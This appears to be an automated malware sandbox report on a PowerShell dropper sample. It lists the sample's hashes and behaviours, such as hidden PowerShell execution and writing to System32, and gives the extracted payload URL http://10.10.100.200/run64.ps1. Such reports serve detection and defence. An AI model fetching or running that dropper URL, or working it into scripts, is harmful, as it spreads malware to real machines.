General

  • Target

    a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

  • Size

    32KB

  • Sample

    240625-zwhk8awanp

  • MD5

    450a158c29545d79072e8eda82ed7acd

  • SHA1

    c52338065058b5af943b4eb22c49402cdd548f1b

  • SHA256

    a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

  • SHA512

    a75d0f9527a6eab60abd2170550660c3189f905d44c886c876e2c4611478e52a21956f29c299544bc43a32f60b83dbc509a41671b3c0d2336be7c8d9d73eb28f

  • SSDEEP

    192:kI24cZEvA+6/6rNavrgYjk+4bWliuVsJ8n7UjkOuqCsLIg0jyI90t7a/RJza:kxyiSwvxjk+tikd7UwqCcIg0jzCtO/

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://10.10.100.200/run64.ps1

Targets

    • Target

      a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

    • Size

      32KB

    • MD5

      450a158c29545d79072e8eda82ed7acd

    • SHA1

      c52338065058b5af943b4eb22c49402cdd548f1b

    • SHA256

      a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

    • SHA512

      a75d0f9527a6eab60abd2170550660c3189f905d44c886c876e2c4611478e52a21956f29c299544bc43a32f60b83dbc509a41671b3c0d2336be7c8d9d73eb28f

    • SSDEEP

      192:kI24cZEvA+6/6rNavrgYjk+4bWliuVsJ8n7UjkOuqCsLIg0jyI90t7a/RJza:kxyiSwvxjk+tikd7UwqCcIg0jzCtO/

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks